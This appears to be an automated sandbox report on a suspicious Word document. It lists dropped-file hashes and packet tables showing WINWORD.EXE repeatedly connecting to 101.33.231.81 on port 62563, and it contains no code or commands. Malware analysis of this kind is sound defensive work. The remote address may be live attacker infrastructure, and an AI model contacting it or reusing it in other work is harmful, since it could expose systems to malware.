Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 1019 |
Entropy (8bit): | 4.554488836456243 |
Encrypted: | false |
SSDEEP: | 12:895d180gXg/XAlCPCHaXWBlXB/zxkpX+W47WiIlgjuicvb0X4PgNDtZ3YilMMEpm:89Dqk/XTm3xqKpIiNeXADv3qwtiY7h |
MD5: | 7A418A293D958E6DFFD2A70C1ED5FA6E |
SHA1: | 235B0D1BC3D75694FF133A96FD5B2A939447F173 |
SHA-256: | 3628ED0E577657AF12609A617151C16C60A1C30869248D5A9E5EB0D5ADAC7375 |
SHA-512: | 2A9FEBEBEC1604A5F0C4ED255FA902A868CDC60617D7687E4C08A2C5DD41CEFA96D4FD8658DEF18BC4E1CE09F26662D863A9143FEBA0C32B1A17FE19F413CB13 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 72 |
Entropy (8bit): | 4.768980259211505 |
Encrypted: | false |
SSDEEP: | 3:bDuMJlrjmUmxW4FXJmUv:bCgjEZl |
MD5: | 32FE8550A0CCE9FFAAF8160013BCD613 |
SHA1: | D7BC50E67446A06F67C6C11C4A3BF7440C823DB7 |
SHA-256: | D6EEA210607E6CFB420E71EADC5363DE3B85D402064F000B53427B9F24A82C5C |
SHA-512: | 9BD43ED73CCC7D71EA062E2495B7433ECA8B99B49AB04691D1073F2B32EA1C8678F4C161656C8E006FA4572C9C83DEA86DEB9FB2557328A447406D598F00FC9F |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l |
MD5: | C5E24006AFAC8C2659023AD09A07EB0F |
SHA1: | 4B7B834BEDADFD0A2764743E021D40C55A51F284 |
SHA-256: | 7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E |
SHA-512: | 673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396 |
Malicious: | false |
Preview: |
Process: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
File Type: | |
Category: | dropped |
Size (bytes): | 162 |
Entropy (8bit): | 2.503835550707525 |
Encrypted: | false |
SSDEEP: | 3:vrJlaCkWtVyEJbiJk/p2TKWWhMGHiV/ln:vdsCkWttViJkh2TKHM9V/l |
MD5: | C5E24006AFAC8C2659023AD09A07EB0F |
SHA1: | 4B7B834BEDADFD0A2764743E021D40C55A51F284 |
SHA-256: | 7C9E6D71E3F53D37A78CCE23FA21D259365A9571C6C3A01E8D216586177BA87E |
SHA-512: | 673649AF8318514414758F92756D408FB6F0CA4859CB2994A921E288126561A7B4EB3C7D824CC90352D939952EA167A473A4282838362B36E85B701A4B582396 |
Malicious: | false |
Preview: |
File type: | |
Entropy (8bit): | 7.997351182794523 |
TrID: |
|
File name: | V3g2Pfu707.docx |
File size: | 520148 |
MD5: | b60cd79e2c14dbeefa22197f76fc3437 |
SHA1: | 07a2811a3ea7a4a0c84e52cb5a48f1e712b55fd9 |
SHA256: | 6ddab79a6d836f9c1ed9ab3bbe28a074c0c93bd87f55144ed62b23c0032715d1 |
SHA512: | 3c565f6be03534118eaf0b35221a4962d7ff8b64af3408ec72949809e9fe8e935652e38dbdaff8960c5e5b886e81d1c0014cb4981e5fed153833e6877c8a8b21 |
SSDEEP: | 12288:ZTAhQSKy2e6tLkAPqq/Q62J0yLz+hyXF+uObrp:1AGSs5Dqq/Qvz+hQU1 |
TLSH: | A6B423F798435185CB2A58BBD80B829BDCF096B724341DD2BCBC24878BC578E4A67527 |
File Content Preview: | PK...........T-../j...........[Content_Types].xml...j.0.E.....6.J.(.....e.h...4v.......c;5%$64..`..{.Xb...V..|...d..I..[!M....k.@....LY.9.A ....x.s..T...e.......Y......z."...:..Y..n8.....&... ..3.l.b.........$OMc....+..@.j<.p.a.).Y.:].q@...2T.=a)].`....r: |
Icon Hash: | e4e6a2a2a4b4b4a4 |
Timestamp | Source Port | Dest Port | Source IP | Dest IP |
---|---|---|---|---|
Jun 16, 2022 14:14:13.200647116 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:13.419831991 CEST | 62563 | 49171 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:13.419950962 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:13.420351028 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:13.639630079 CEST | 62563 | 49171 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:13.639849901 CEST | 62563 | 49171 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:13.639898062 CEST | 62563 | 49171 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:13.640002012 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:13.640063047 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:13.640408993 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:13.640434980 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:13.860094070 CEST | 62563 | 49171 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:13.860392094 CEST | 49171 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:19.710747004 CEST | 49172 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:19.936655045 CEST | 62563 | 49172 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:19.936779022 CEST | 49172 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:19.937015057 CEST | 49172 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:20.162826061 CEST | 62563 | 49172 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:20.163181067 CEST | 62563 | 49172 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:20.163198948 CEST | 62563 | 49172 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:20.163311958 CEST | 49172 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:20.164453983 CEST | 49172 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:20.389482021 CEST | 62563 | 49172 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:24.171586037 CEST | 49173 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.391859055 CEST | 62563 | 49173 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:24.392083883 CEST | 49173 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.392182112 CEST | 49173 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.620903969 CEST | 62563 | 49173 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:24.621507883 CEST | 62563 | 49173 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:24.621608973 CEST | 62563 | 49173 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:24.621690035 CEST | 49173 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.621742010 CEST | 49173 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.653074026 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.879235983 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:24.879453897 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:24.879733086 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.105087996 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105336905 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105357885 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105380058 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105386972 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.105397940 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105415106 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.105420113 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105422020 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.105441093 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.105463982 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.105475903 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.105485916 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.107275963 CEST | 49174 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.282200098 CEST | 49175 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.332889080 CEST | 62563 | 49174 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.520860910 CEST | 62563 | 49175 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.522223949 CEST | 49175 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.529230118 CEST | 49175 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.767404079 CEST | 62563 | 49175 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.767446995 CEST | 62563 | 49175 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.767477036 CEST | 62563 | 49175 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:25.767688990 CEST | 49175 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.773453951 CEST | 49175 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:25.798341036 CEST | 49175 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.035690069 CEST | 49176 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.042843103 CEST | 62563 | 49175 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:26.267914057 CEST | 62563 | 49176 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:26.272712946 CEST | 49176 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.705780029 CEST | 49176 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.935129881 CEST | 62563 | 49176 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:26.935430050 CEST | 62563 | 49176 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:26.935553074 CEST | 49176 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.935630083 CEST | 62563 | 49176 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:26.935693026 CEST | 49176 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.972496033 CEST | 49176 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:26.981375933 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.199357033 CEST | 62563 | 49177 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:27.199461937 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.199563980 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.204574108 CEST | 62563 | 49176 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:27.425786972 CEST | 62563 | 49177 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:27.426418066 CEST | 62563 | 49177 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:27.426486015 CEST | 62563 | 49177 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:27.426542044 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.426580906 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.699702024 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.699749947 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.795510054 CEST | 49178 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:27.917646885 CEST | 62563 | 49177 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:27.917768002 CEST | 49177 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.021208048 CEST | 62563 | 49178 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.021270037 CEST | 49178 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.021584988 CEST | 49178 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.252446890 CEST | 62563 | 49178 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.252801895 CEST | 62563 | 49178 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.252918959 CEST | 62563 | 49178 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.253289938 CEST | 49178 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.253407955 CEST | 49178 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.273581982 CEST | 49179 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.486635923 CEST | 62563 | 49178 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.498446941 CEST | 62563 | 49179 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.498533964 CEST | 49179 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.498740911 CEST | 49179 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.723367929 CEST | 62563 | 49179 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.724132061 CEST | 62563 | 49179 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.724153042 CEST | 62563 | 49179 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.724286079 CEST | 49179 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.724567890 CEST | 49179 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.727380037 CEST | 49180 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.944974899 CEST | 62563 | 49180 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:28.945199013 CEST | 49180 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.945367098 CEST | 49180 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:28.949407101 CEST | 62563 | 49179 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.165206909 CEST | 62563 | 49180 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.165652990 CEST | 62563 | 49180 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.165743113 CEST | 62563 | 49180 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.165776968 CEST | 49180 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.165808916 CEST | 49180 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.165961027 CEST | 49180 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.352849007 CEST | 49181 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.391634941 CEST | 62563 | 49180 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.578943014 CEST | 62563 | 49181 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.579046011 CEST | 49181 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.579180002 CEST | 49181 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.796778917 CEST | 62563 | 49181 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.797437906 CEST | 62563 | 49181 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.797458887 CEST | 62563 | 49181 | 101.33.231.81 | 192.168.2.22 |
Jun 16, 2022 14:14:29.797610044 CEST | 49181 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:29.800673008 CEST | 49181 | 62563 | 192.168.2.22 | 101.33.231.81 |
Jun 16, 2022 14:14:30.019037008 CEST | 62563 | 49181 | 101.33.231.81 | 192.168.2.22 |
|
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
0 | 192.168.2.22 | 49171 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:13.420351028 CEST | 1 | OUT | |
Jun 16, 2022 14:14:13.639849901 CEST | 2 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
1 | 192.168.2.22 | 49172 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:19.937015057 CEST | 3 | OUT | |
Jun 16, 2022 14:14:20.163181067 CEST | 4 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
10 | 192.168.2.22 | 49181 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:29.579180002 CEST | 19 | OUT | |
Jun 16, 2022 14:14:29.797437906 CEST | 19 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
2 | 192.168.2.22 | 49173 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:24.392182112 CEST | 4 | OUT | |
Jun 16, 2022 14:14:24.621507883 CEST | 4 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
3 | 192.168.2.22 | 49174 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:24.879733086 CEST | 6 | OUT | |
Jun 16, 2022 14:14:25.105336905 CEST | 6 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
4 | 192.168.2.22 | 49175 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:25.529230118 CEST | 13 | OUT | |
Jun 16, 2022 14:14:25.767446995 CEST | 13 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
5 | 192.168.2.22 | 49176 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:26.705780029 CEST | 14 | OUT | |
Jun 16, 2022 14:14:26.935430050 CEST | 14 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
6 | 192.168.2.22 | 49177 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:27.199563980 CEST | 15 | OUT | |
Jun 16, 2022 14:14:27.426418066 CEST | 15 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
7 | 192.168.2.22 | 49178 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:28.021584988 CEST | 16 | OUT | |
Jun 16, 2022 14:14:28.252801895 CEST | 16 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
8 | 192.168.2.22 | 49179 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:28.498740911 CEST | 17 | OUT | |
Jun 16, 2022 14:14:28.724132061 CEST | 18 | IN |
Session ID | Source IP | Source Port | Destination IP | Destination Port | Process |
---|---|---|---|---|---|
9 | 192.168.2.22 | 49180 | 101.33.231.81 | 62563 | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Timestamp | kBytes transferred | Direction | Data |
---|---|---|---|
Jun 16, 2022 14:14:28.945367098 CEST | 18 | OUT | |
Jun 16, 2022 14:14:29.165652990 CEST | 18 | IN |
Click to jump to process
Click to jump to process
back
Click to dive into process behavior distribution
Target ID: | 0 |
Start time: | 14:14:11 |
Start date: | 16/06/2022 |
Path: | C:\Program Files\Microsoft Office\Office14\WINWORD.EXE |
Wow64 process (32bit): | false |
Commandline: | |
Imagebase: | 0x13f040000 |
File size: | 1423704 bytes |
MD5 hash: | 9EE74859D22DAE61F1750B3A1BACB6F5 |
Has elevated privileges: | true |
Has administrator privileges: | true |
Programmed in: | C, C++ or other language |
Reputation: | high |